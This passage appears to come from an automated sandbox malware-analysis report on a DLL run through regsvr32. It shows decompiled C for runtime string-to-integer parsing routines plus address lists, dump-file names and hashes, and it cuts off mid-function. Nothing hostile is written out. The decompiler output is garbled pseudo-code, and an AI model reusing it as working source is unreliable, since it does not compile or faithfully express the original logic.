                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v120;
                                                                      				intOrPtr _v124;
                                                                      				intOrPtr _v128;
                                                                      				intOrPtr _v132;
                                                                      				intOrPtr _v136;
                                                                      				intOrPtr _v140;
                                                                      				intOrPtr _v144;
                                                                      				intOrPtr _v148;
                                                                      				intOrPtr _v152;
                                                                      				long long _v160;
                                                                      				long long _v168;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t156;
                                                                      				void* _t186;
                                                                      				signed short _t200;
                                                                      				signed short _t201;
                                                                      				signed int _t202;
                                                                      				signed int _t251;
                                                                      				signed int _t253;
                                                                      				signed int _t255;
                                                                      				signed int _t256;
                                                                      				signed int _t259;
                                                                      				signed int _t262;
                                                                      				signed short* _t381;
                                                                      				signed short* _t382;
                                                                      				signed short* _t383;
                                                                      				signed short* _t385;
                                                                      				signed short** _t386;
                                                                      				long long _t387;
                                                                      				long long* _t390;
                                                                      				signed short* _t391;
                                                                      				long long* _t395;
                                                                      				long long* _t396;
                                                                      				long long* _t397;
                                                                      				signed short** _t398;
                                                                      				void* _t399;
                                                                      				void* _t400;
                                                                      				signed short* _t405;
                                                                      				signed short* _t406;
                                                                      				long long _t407;
                                                                      				signed short* _t408;
                                                                      				long long _t409;
                                                                      				intOrPtr _t410;
                                                                      
                                                                      				_t395 = __rdx;
                                                                      				_t387 = __rbx;
                                                                      				_a24 = __rbx;
                                                                      				_a8 = __rcx;
                                                                      				_t407 =  *((intOrPtr*)(__rdx));
                                                                      				r13d = 0;
                                                                      				_t256 = r9b & 0xffffffff;
                                                                      				r14d = r8d;
                                                                      				_v64 = _t407;
                                                                      				_t398 = __rdx;
                                                                      				if (_t407 != 0) goto 0x8002be93;
                                                                      				E0000000118003BFFC(_t407, __rax);
                                                                      				 *__rax = 0x16;
                                                                      				E0000000118003A794();
                                                                      				goto 0x8002bec5;
                                                                      				if (r14d == 0) goto 0x8002bedd;
                                                                      				if (__r8 - 2 - 0x22 <= 0) goto 0x8002bedd;
                                                                      				_v160 = __rcx;
                                                                      				r9d = 0;
                                                                      				 *((char*)(__rcx + 0x30)) = 1;
                                                                      				r8d = 0;
                                                                      				 *(__rcx + 0x2c) = 0x16;
                                                                      				_v168 = _t409;
                                                                      				E0000000118003AA20(__rax, __rbx, __rcx, __rdx, _t399, _t400, __r8);
                                                                      				_t390 = _t398[1];
                                                                      				if (_t390 == 0) goto 0x8002c529;
                                                                      				 *_t390 =  *_t398;
                                                                      				goto 0x8002c529;
                                                                      				 *_t395 = _t407 + 2;
                                                                      				_t261 = r13d;
                                                                      				if ( *((intOrPtr*)(_t390 + 0x28)) != r13b) goto 0x8002bf07;
                                                                      				E00000001180006E80(_t407 + 2, _t387, _t390, _t395, _t399);
                                                                      				goto 0x8002bf07;
                                                                      				_t379 =  *_t398;
                                                                      				 *_t398 =  &(( *_t398)[1]);
                                                                      				if (E00000001180045944( *_t379 & 0xffff, 8, _t387, _t390) != 0) goto 0x8002befa;
                                                                      				_t258 =  !=  ? _t256 : _t256 | 0x00000002;
                                                                      				if ((0x0000fffd & _t387 - 0x0000002b) != 0) goto 0x8002bf3e;
                                                                      				_t381 =  *_t398;
                                                                      				_t200 =  *_t381 & 0x0000ffff;
                                                                      				_t382 =  &(_t381[1]);
                                                                      				 *_t398 = _t382;
                                                                      				_a16 = 0xa70;
                                                                      				_v152 = 0xae6;
                                                                      				_v148 = 0xaf0;
                                                                      				_v144 = 0xb66;
                                                                      				r8d = 0x660;
                                                                      				_v140 = 0xb70;
                                                                      				_t20 = _t382 - 0x80; // 0x5e0
                                                                      				r9d = _t20;
                                                                      				_v136 = 0xc66;
                                                                      				r10d = 0x6f0;
                                                                      				_v132 = 0xc70;
                                                                      				r11d = 0x966;
                                                                      				_v128 = 0xce6;
                                                                      				_v124 = 0xcf0;
                                                                      				_v120 = 0xd66;
                                                                      				_v116 = 0xd70;
                                                                      				_v112 = 0xe50;
                                                                      				_v108 = 0xe5a;
                                                                      				_v104 = 0xed0;
                                                                      				_v100 = 0xeda;
                                                                      				_v96 = 0xf20;
                                                                      				_v92 = 0xf2a;
                                                                      				_v88 = 0x1040;
                                                                      				_v84 = 0x104a;
                                                                      				_v80 = 0x17e0;
                                                                      				_v76 = 0x17ea;
                                                                      				_v72 = 0x1810;
                                                                      				_v68 = 0xff1a;
                                                                      				if ((r14d & 0xffffffef) != 0) goto 0x8002c2ac;
                                                                      				if (_t200 - 0x30 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - 0x3a >= 0) goto 0x8002c04a;
                                                                      				goto 0x8002c1f6;
                                                                      				if (_t200 - 0xff10 >= 0) goto 0x8002c1e7;
                                                                      				if (_t200 - r8w < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - 0x66a >= 0) goto 0x8002c072;
                                                                      				goto 0x8002c1f6;
                                                                      				if (_t200 - r10w < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - 0x6fa >= 0) goto 0x8002c091;
                                                                      				goto 0x8002c1f6;
                                                                      				if (_t200 - r11w < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - 0x970 >= 0) goto 0x8002c0b0;
                                                                      				goto 0x8002c1f6;
                                                                      				if (_t200 - r9w < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - 0x9f0 >= 0) goto 0x8002c0cf;
                                                                      				goto 0x8002c1f6;
                                                                      				if (_t200 - (_t200 & 0x0000ffff) - r9d < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _a16 >= 0) goto 0x8002c0ef;
                                                                      				goto 0x8002c1f6;
                                                                      				if (_t200 - _v152 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v148 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v144 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v140 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v136 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v132 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v128 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v124 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v120 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v116 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v112 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v108 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v104 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v100 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v96 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v92 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v88 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v84 < 0) goto 0x8002c040;
                                                                      				if (_t200 - _v80 < 0) goto 0x8002c1fb;
                                                                      				if (_t200 - _v76 < 0) goto 0x8002c040;
                                                                      				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8002c1fb;
                                                                      				goto 0x8002c040;
                                                                      				if (_t200 - _v68 >= 0) goto 0x8002c1fb;
                                                                      				if ((_t200 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x8002c21d;
                                                                      				_t64 = _t390 - 0x41; // -17
                                                                      				_t65 = _t390 - 0x61; // -49
                                                                      				_t156 = _t65;
                                                                      				if (_t64 - 0x19 <= 0) goto 0x8002c212;
                                                                      				if (_t156 - 0x19 > 0) goto 0x8002c29d;
                                                                      				if (_t156 - 0x19 > 0) goto 0x8002c21a;
                                                                      				_t66 = _t390 - 0x37; // -231
                                                                      				if (_t66 != 0) goto 0x8002c29d;
                                                                      				_t391 =  *_t398;
                                                                      				r9d = 0xffdf;
                                                                      				_t251 =  *_t391 & 0x0000ffff;
                                                                      				_t67 =  &(_t391[1]); // 0xffe1
                                                                      				_t405 = _t67;
                                                                      				 *_t398 = _t405;
                                                                      				_t68 = _t395 - 0x58; // 0x698
                                                                      				if ((r9w & _t68) == 0) goto 0x8002c285;
                                                                      				 *_t398 = _t391;
                                                                      				_t160 =  !=  ? r14d : 8;
                                                                      				r14d =  !=  ? r14d : 8;
                                                                      				if (_t251 == 0) goto 0x8002c27d;
                                                                      				if ( *_t391 == _t251) goto 0x8002c27d;
                                                                      				E0000000118003BFFC( *_t391 - _t251, _t382);
                                                                      				 *_t382 = 0x16;
                                                                      				E0000000118003A794();
                                                                      				r8d = 0x660;
                                                                      				r10d = 0x6f0;
                                                                      				r11d = 0x966;
                                                                      				goto 0x8002c2ac;
                                                                      				r8d = 0x660;
                                                                      				goto 0x8002c2ac;
                                                                      				_t201 =  *_t405 & 0x0000ffff;
                                                                      				_t71 =  &(_t405[1]); // 0xffe3
                                                                      				_t383 = _t71;
                                                                      				 *_t398 = _t383;
                                                                      				r8d = 0x660;
                                                                      				goto 0x8002c2a2;
                                                                      				_t165 =  !=  ? r14d : 0xa;
                                                                      				r14d = 0xa;
                                                                      				_t166 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                      				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				_t253 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				r12d = 0x30;
                                                                      				r15d = 0xff10;
                                                                      				r9d = 0xa / r14d;
                                                                      				if (_t201 - r12w < 0) goto 0x8002c47c;
                                                                      				if (_t201 - 0x3a >= 0) goto 0x8002c2de;
                                                                      				goto 0x8002c477;
                                                                      				if (_t201 - r15w >= 0) goto 0x8002c467;
                                                                      				if (_t201 - r8w < 0) goto 0x8002c47c;
                                                                      				if (_t201 - 0x66a >= 0) goto 0x8002c307;
                                                                      				goto 0x8002c477;
                                                                      				if (_t201 - r10w < 0) goto 0x8002c47c;
                                                                      				if (_t201 - 0x6fa >= 0) goto 0x8002c326;
                                                                      				goto 0x8002c477;
                                                                      				if (_t201 - r11w < 0) goto 0x8002c47c;
                                                                      				if (_t201 - 0x970 >= 0) goto 0x8002c345;
                                                                      				goto 0x8002c477;
                                                                      				if (_t201 - 0x9e6 < 0) goto 0x8002c47c;
                                                                      				_t76 =  &(_t383[5]); // 0x9f0
                                                                      				if (_t201 - _t76 >= 0) goto 0x8002c365;
                                                                      				goto 0x8002c477;
                                                                      				if (_t201 - 0xa66 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _a16 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v152 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v148 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v144 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v140 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v136 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v132 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v128 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v124 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v120 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v116 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v112 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v108 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v104 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v100 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v96 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v92 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v88 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v84 < 0) goto 0x8002c35b;
                                                                      				if (_t201 - _v80 < 0) goto 0x8002c47c;
                                                                      				if (_t201 - _v76 < 0) goto 0x8002c35b;
                                                                      				if ((_t201 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8002c47c;
                                                                      				goto 0x8002c477;
                                                                      				if (_t201 - _v68 >= 0) goto 0x8002c47c;
                                                                      				if ((_t201 & 0x0000ffff) - r15d != 0xffffffff) goto 0x8002c49f;
                                                                      				_t100 = _t391 - 0x41; // -65
                                                                      				_t101 = _t391 - 0x61; // -97
                                                                      				_t186 = _t101;
                                                                      				if (_t100 - 0x19 <= 0) goto 0x8002c48f;
                                                                      				if (_t186 - 0x19 > 0) goto 0x8002c49c;
                                                                      				if (_t186 - 0x19 > 0) goto 0x8002c497;
                                                                      				goto 0x8002c49f;
                                                                      				_t406 =  *_t398;
                                                                      				if (((_t201 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x8002c4e3;
                                                                      				_t202 =  *_t406 & 0x0000ffff;
                                                                      				_t255 = _t383 + _t391;
                                                                      				_t262 = _t255;
                                                                      				r8d = 0x660;
                                                                      				 *_t398 =  &(_t406[1]);
                                                                      				_t259 = ( !=  ? _t256 : _t256 | 0x00000002) | (r13d & 0xffffff00 | _t255 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t261 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				goto 0x8002c2c3;
                                                                      				_t410 = _a8;
                                                                      				_t385 = _t406 - 2;
                                                                      				_t408 = _v64;
                                                                      				 *_t398 = _t385;
                                                                      				if (_t202 == 0) goto 0x8002c514;
                                                                      				if ( *_t385 == _t202) goto 0x8002c514;
                                                                      				E0000000118003BFFC( *_t385 - _t202, _t385);
                                                                      				 *_t385 = 0x16;
                                                                      				E0000000118003A794();
                                                                      				if ((sil & 0x00000008) != 0) goto 0x8002c530;
                                                                      				_t386 = _t398[1];
                                                                      				 *_t398 = _t408;
                                                                      				if (_t386 == 0) goto 0x8002c529;
                                                                      				 *_t386 = _t408;
                                                                      				goto 0x8002c5b4;
                                                                      				r8d = 0x80000000;
                                                                      				r9d = _t406 - 1;
                                                                      				if ((sil & 0x00000004) != 0) goto 0x8002c558;
                                                                      				if ((sil & 0x00000001) == 0) goto 0x8002c59b;
                                                                      				if ((sil & 0x00000002) == 0) goto 0x8002c553;
                                                                      				if (_t262 - r8d <= 0) goto 0x8002c5a1;
                                                                      				goto 0x8002c558;
                                                                      				if (_t262 - r9d <= 0) goto 0x8002c5a3;
                                                                      				 *((char*)(_t410 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t410 + 0x2c)) = 0x22;
                                                                      				if ((_t259 & 0x00000001) != 0) goto 0x8002c573;
                                                                      				goto 0x8002c5a3;
                                                                      				_t396 = _t398[1];
                                                                      				if ((_t259 & 0x00000002) == 0) goto 0x8002c58b;
                                                                      				if (_t396 == 0) goto 0x8002c586;
                                                                      				 *_t396 =  *_t398;
                                                                      				goto 0x8002c5b4;
                                                                      				if (_t396 == 0) goto 0x8002c596;
                                                                      				 *_t396 =  *_t398;
                                                                      				goto 0x8002c5b4;
                                                                      				if ((sil & 0x00000002) == 0) goto 0x8002c5a3;
                                                                      				_t397 = _t398[1];
                                                                      				if (_t397 == 0) goto 0x8002c5b2;
                                                                      				 *_t397 =  *_t398;
                                                                      				return  ~(_t262 | 0xffffffff);
                                                                      			}





























































                                                                      0x18002be48
                                                                      0x18002be48
                                                                      0x18002be48
                                                                      0x18002be4d
                                                                      0x18002be64
                                                                      0x18002be67
                                                                      0x18002be6a
                                                                      0x18002be6e
                                                                      0x18002be71
                                                                      0x18002be79
                                                                      0x18002be7f
                                                                      0x18002be81
                                                                      0x18002be86
                                                                      0x18002be8c
                                                                      0x18002be91
                                                                      0x18002be96
                                                                      0x18002be9f
                                                                      0x18002bea1
                                                                      0x18002bea6
                                                                      0x18002bea9
                                                                      0x18002bead
                                                                      0x18002beb0
                                                                      0x18002bebb
                                                                      0x18002bec0
                                                                      0x18002bec5
                                                                      0x18002becc
                                                                      0x18002bed5
                                                                      0x18002bed8
                                                                      0x18002bee7
                                                                      0x18002beea
                                                                      0x18002bef1
                                                                      0x18002bef3
                                                                      0x18002bef8
                                                                      0x18002befa
                                                                      0x18002bf04
                                                                      0x18002bf16
                                                                      0x18002bf26
                                                                      0x18002bf2f
                                                                      0x18002bf31
                                                                      0x18002bf34
                                                                      0x18002bf37
                                                                      0x18002bf3b
                                                                      0x18002bf3e
                                                                      0x18002bf4e
                                                                      0x18002bf5b
                                                                      0x18002bf68
                                                                      0x18002bf70
                                                                      0x18002bf76
                                                                      0x18002bf7e
                                                                      0x18002bf7e
                                                                      0x18002bf82
                                                                      0x18002bf8a
                                                                      0x18002bf90
                                                                      0x18002bf98
                                                                      0x18002bf9e
                                                                      0x18002bfa6
                                                                      0x18002bfae
                                                                      0x18002bfb6
                                                                      0x18002bfbe
                                                                      0x18002bfc6
                                                                      0x18002bfce
                                                                      0x18002bfd6
                                                                      0x18002bfde
                                                                      0x18002bfe6
                                                                      0x18002bfee
                                                                      0x18002bff6
                                                                      0x18002bffe
                                                                      0x18002c006
                                                                      0x18002c00e
                                                                      0x18002c019
                                                                      0x18002c02b
                                                                      0x18002c034
                                                                      0x18002c03e
                                                                      0x18002c045
                                                                      0x18002c04d
                                                                      0x18002c057
                                                                      0x18002c065
                                                                      0x18002c06d
                                                                      0x18002c076
                                                                      0x18002c084
                                                                      0x18002c08c
                                                                      0x18002c095
                                                                      0x18002c0a3
                                                                      0x18002c0ab
                                                                      0x18002c0b4
                                                                      0x18002c0c2
                                                                      0x18002c0ca
                                                                      0x18002c0d2
                                                                      0x18002c0e0
                                                                      0x18002c0ea
                                                                      0x18002c0f6
                                                                      0x18002c101
                                                                      0x18002c10e
                                                                      0x18002c119
                                                                      0x18002c126
                                                                      0x18002c131
                                                                      0x18002c13e
                                                                      0x18002c149
                                                                      0x18002c156
                                                                      0x18002c161
                                                                      0x18002c16e
                                                                      0x18002c179
                                                                      0x18002c186
                                                                      0x18002c18d
                                                                      0x18002c19a
                                                                      0x18002c1a1
                                                                      0x18002c1ae
                                                                      0x18002c1b5
                                                                      0x18002c1c2
                                                                      0x18002c1c9
                                                                      0x18002c1e0
                                                                      0x18002c1e2
                                                                      0x18002c1ef
                                                                      0x18002c1f9
                                                                      0x18002c1fe
                                                                      0x18002c204
                                                                      0x18002c204
                                                                      0x18002c207
                                                                      0x18002c20c
                                                                      0x18002c215
                                                                      0x18002c21a
                                                                      0x18002c21f
                                                                      0x18002c221
                                                                      0x18002c224
                                                                      0x18002c22a
                                                                      0x18002c22d
                                                                      0x18002c22d
                                                                      0x18002c231
                                                                      0x18002c234
                                                                      0x18002c23b
                                                                      0x18002c240
                                                                      0x18002c248
                                                                      0x18002c24c
                                                                      0x18002c252
                                                                      0x18002c257
                                                                      0x18002c259
                                                                      0x18002c25e
                                                                      0x18002c264
                                                                      0x18002c269
                                                                      0x18002c26f
                                                                      0x18002c275
                                                                      0x18002c27b
                                                                      0x18002c27d
                                                                      0x18002c283
                                                                      0x18002c285
                                                                      0x18002c289
                                                                      0x18002c289
                                                                      0x18002c28d
                                                                      0x18002c290
                                                                      0x18002c29b
                                                                      0x18002c2a5
                                                                      0x18002c2a9
                                                                      0x18002c2ae
                                                                      0x18002c2b1
                                                                      0x18002c2b1
                                                                      0x18002c2b4
                                                                      0x18002c2ba
                                                                      0x18002c2c0
                                                                      0x18002c2c7
                                                                      0x18002c2d1
                                                                      0x18002c2d9
                                                                      0x18002c2e2
                                                                      0x18002c2ec
                                                                      0x18002c2fa
                                                                      0x18002c302
                                                                      0x18002c30b
                                                                      0x18002c319
                                                                      0x18002c321
                                                                      0x18002c32a
                                                                      0x18002c338
                                                                      0x18002c340
                                                                      0x18002c34d
                                                                      0x18002c353
                                                                      0x18002c359
                                                                      0x18002c360
                                                                      0x18002c36d
                                                                      0x18002c37b
                                                                      0x18002c384
                                                                      0x18002c38f
                                                                      0x18002c398
                                                                      0x18002c3a3
                                                                      0x18002c3ac
                                                                      0x18002c3b7
                                                                      0x18002c3c0
                                                                      0x18002c3cb
                                                                      0x18002c3d4
                                                                      0x18002c3df
                                                                      0x18002c3ec
                                                                      0x18002c3f7
                                                                      0x18002c404
                                                                      0x18002c40b
                                                                      0x18002c418
                                                                      0x18002c41f
                                                                      0x18002c42c
                                                                      0x18002c433
                                                                      0x18002c440
                                                                      0x18002c447
                                                                      0x18002c45e
                                                                      0x18002c465
                                                                      0x18002c46f
                                                                      0x18002c47a
                                                                      0x18002c47f
                                                                      0x18002c485
                                                                      0x18002c485
                                                                      0x18002c488
                                                                      0x18002c48d
                                                                      0x18002c492
                                                                      0x18002c49a
                                                                      0x18002c49f
                                                                      0x18002c4a5
                                                                      0x18002c4a7
                                                                      0x18002c4b1
                                                                      0x18002c4c2
                                                                      0x18002c4d0
                                                                      0x18002c4d9
                                                                      0x18002c4dc
                                                                      0x18002c4de
                                                                      0x18002c4e3
                                                                      0x18002c4eb
                                                                      0x18002c4ef
                                                                      0x18002c4f7
                                                                      0x18002c4fd
                                                                      0x18002c502
                                                                      0x18002c504
                                                                      0x18002c509
                                                                      0x18002c50f
                                                                      0x18002c518
                                                                      0x18002c51a
                                                                      0x18002c51e
                                                                      0x18002c524
                                                                      0x18002c526
                                                                      0x18002c52b
                                                                      0x18002c530
                                                                      0x18002c536
                                                                      0x18002c53e
                                                                      0x18002c544
                                                                      0x18002c54a
                                                                      0x18002c54f
                                                                      0x18002c551
                                                                      0x18002c556
                                                                      0x18002c55a
                                                                      0x18002c562
                                                                      0x18002c56c
                                                                      0x18002c571
                                                                      0x18002c573
                                                                      0x18002c579
                                                                      0x18002c57e
                                                                      0x18002c583
                                                                      0x18002c589
                                                                      0x18002c58e
                                                                      0x18002c593
                                                                      0x18002c599
                                                                      0x18002c59f
                                                                      0x18002c5a3
                                                                      0x18002c5aa
                                                                      0x18002c5af
                                                                      0x18002c5ce

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: -$0$f$p$p
                                                                      • API String ID: 3215553584-1865143739
                                                                      • Opcode ID: e8511833325737c3a0fda722d92dcf22fd0437a3cbbae2de6291a5705607c06e
                                                                      • Instruction ID: a6197650a13f4b6248bcf37415ddf369c2f24227795c940c9c77b1a6a9293002
                                                                      • Opcode Fuzzy Hash: e8511833325737c3a0fda722d92dcf22fd0437a3cbbae2de6291a5705607c06e
                                                                      • Instruction Fuzzy Hash: 0112E47260464986FBA7AA15D054FFA7791F3497D4F88C116F6C247AC4CF38CB888B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 63%
                                                                      			E0000000118002C5D0(intOrPtr* __rax, long long __rbx, long long __rcx, signed long long* __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                      				void* _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v120;
                                                                      				intOrPtr _v124;
                                                                      				intOrPtr _v128;
                                                                      				intOrPtr _v132;
                                                                      				intOrPtr _v136;
                                                                      				intOrPtr _v140;
                                                                      				intOrPtr _v144;
                                                                      				intOrPtr _v148;
                                                                      				intOrPtr _v152;
                                                                      				long long _v160;
                                                                      				signed long long _v168;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t152;
                                                                      				void* _t181;
                                                                      				signed int _t182;
                                                                      				void* _t187;
                                                                      				signed short _t190;
                                                                      				signed short _t191;
                                                                      				signed int _t192;
                                                                      				signed int _t232;
                                                                      				signed int _t241;
                                                                      				signed int _t243;
                                                                      				signed int _t246;
                                                                      				void* _t344;
                                                                      				void* _t345;
                                                                      				signed short* _t362;
                                                                      				signed long long _t363;
                                                                      				signed long long _t364;
                                                                      				signed long long _t367;
                                                                      				signed long long _t369;
                                                                      				signed long long* _t370;
                                                                      				long long _t376;
                                                                      				long long* _t379;
                                                                      				signed short* _t380;
                                                                      				long long* _t381;
                                                                      				long long* _t383;
                                                                      				long long* _t386;
                                                                      				signed long long* _t387;
                                                                      				void* _t388;
                                                                      				void* _t389;
                                                                      				signed long long _t390;
                                                                      				signed short* _t398;
                                                                      				signed short* _t399;
                                                                      				signed long long _t400;
                                                                      				long long _t402;
                                                                      				signed long long _t403;
                                                                      				signed long long _t404;
                                                                      				intOrPtr _t405;
                                                                      
                                                                      				_t383 = __rdx;
                                                                      				_t376 = __rbx;
                                                                      				_a24 = __rbx;
                                                                      				_a8 = __rcx;
                                                                      				_t402 =  *((intOrPtr*)(__rdx));
                                                                      				r13d = 0;
                                                                      				_t246 = r9b & 0xffffffff;
                                                                      				r15d = r8d;
                                                                      				_v64 = _t402;
                                                                      				_t387 = __rdx;
                                                                      				if (_t402 != 0) goto 0x8002c61b;
                                                                      				E0000000118003BFFC(_t402, __rax);
                                                                      				 *__rax = 0x16;
                                                                      				E0000000118003A794();
                                                                      				goto 0x8002c64d;
                                                                      				if (r15d == 0) goto 0x8002c665;
                                                                      				if (__r8 - 2 - 0x22 <= 0) goto 0x8002c665;
                                                                      				_v160 = __rcx;
                                                                      				r9d = 0;
                                                                      				 *((char*)(__rcx + 0x30)) = 1;
                                                                      				r8d = 0;
                                                                      				 *((intOrPtr*)(__rcx + 0x2c)) = 0x16;
                                                                      				_v168 = _t404;
                                                                      				E0000000118003AA20(__rax, __rbx, __rcx, __rdx, _t388, _t389, __r8);
                                                                      				_t379 = _t387[1];
                                                                      				if (_t379 == 0) goto 0x8002ccad;
                                                                      				 *_t379 =  *_t387;
                                                                      				goto 0x8002ccad;
                                                                      				 *_t383 = _t402 + 2;
                                                                      				_t390 = _t404;
                                                                      				if ( *((intOrPtr*)(_t379 + 0x28)) != r13b) goto 0x8002c68f;
                                                                      				E00000001180006E80(_t402 + 2, _t376, _t379, _t383, _t388);
                                                                      				goto 0x8002c68f;
                                                                      				_t360 =  *_t387;
                                                                      				 *_t387 =  *_t387 + 2;
                                                                      				if (E00000001180045944( *_t360 & 0xffff, 8, _t376, _t379) != 0) goto 0x8002c682;
                                                                      				_t248 =  !=  ? _t246 : _t246 | 0x00000002;
                                                                      				if ((0x0000fffd & _t376 - 0x0000002b) != 0) goto 0x8002c6c6;
                                                                      				_t362 =  *_t387;
                                                                      				_t190 =  *_t362 & 0x0000ffff;
                                                                      				_t363 =  &(_t362[1]);
                                                                      				 *_t387 = _t363;
                                                                      				_a16 = 0xa70;
                                                                      				_v152 = 0xae6;
                                                                      				_v148 = 0xaf0;
                                                                      				_v144 = 0xb66;
                                                                      				r8d = 0x660;
                                                                      				_v140 = 0xb70;
                                                                      				_t20 = _t363 - 0x80; // 0x5e0
                                                                      				r10d = _t20;
                                                                      				_v136 = 0xc66;
                                                                      				r11d = 0x6f0;
                                                                      				_v132 = 0xc70;
                                                                      				r9d = 0x966;
                                                                      				_v128 = 0xce6;
                                                                      				_v124 = 0xcf0;
                                                                      				_v120 = 0xd66;
                                                                      				_v116 = 0xd70;
                                                                      				_v112 = 0xe50;
                                                                      				_v108 = 0xe5a;
                                                                      				_v104 = 0xed0;
                                                                      				_v100 = 0xeda;
                                                                      				_v96 = 0xf20;
                                                                      				_v92 = 0xf2a;
                                                                      				_v88 = 0x1040;
                                                                      				_v84 = 0x104a;
                                                                      				_v80 = 0x17e0;
                                                                      				_v76 = 0x17ea;
                                                                      				_v72 = 0x1810;
                                                                      				_v68 = 0xff1a;
                                                                      				if ((r15d & 0xffffffef) != 0) goto 0x8002ca2e;
                                                                      				if (_t190 - 0x30 < 0) goto 0x8002c983;
                                                                      				if (_t190 - 0x3a >= 0) goto 0x8002c7d2;
                                                                      				goto 0x8002c97e;
                                                                      				if (_t190 - 0xff10 >= 0) goto 0x8002c96f;
                                                                      				if (_t190 - r8w < 0) goto 0x8002c983;
                                                                      				if (_t190 - 0x66a >= 0) goto 0x8002c7fa;
                                                                      				goto 0x8002c97e;
                                                                      				if (_t190 - r11w < 0) goto 0x8002c983;
                                                                      				if (_t190 - 0x6fa >= 0) goto 0x8002c819;
                                                                      				goto 0x8002c97e;
                                                                      				if (_t190 - r9w < 0) goto 0x8002c983;
                                                                      				if (_t190 - 0x970 >= 0) goto 0x8002c838;
                                                                      				goto 0x8002c97e;
                                                                      				if (_t190 - r10w < 0) goto 0x8002c983;
                                                                      				if (_t190 - 0x9f0 >= 0) goto 0x8002c857;
